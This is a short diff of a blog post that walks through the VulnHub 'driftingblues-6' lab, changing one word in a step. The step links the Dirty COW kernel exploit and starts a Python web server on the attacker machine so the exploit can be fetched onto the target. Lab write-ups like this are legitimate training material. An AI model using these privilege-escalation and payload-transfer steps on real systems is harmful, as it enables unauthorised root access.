Ha-L0/Ha-L0.github.io/_posts/2022-11-19-[H4]-Proving-Grounds-Play-VULNHUB-driftingblues-6.md

 Lets try [`dirty cow`](http://www.exploit-db.com/exploits/40616)

-After downloading the source file we provide it on our attacker machine, so we can download it from the target.
+After downloading the source file we provide it on our attacker machine, so we can download it to the target.
 ```bash
  python3 -m http.server 80
 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...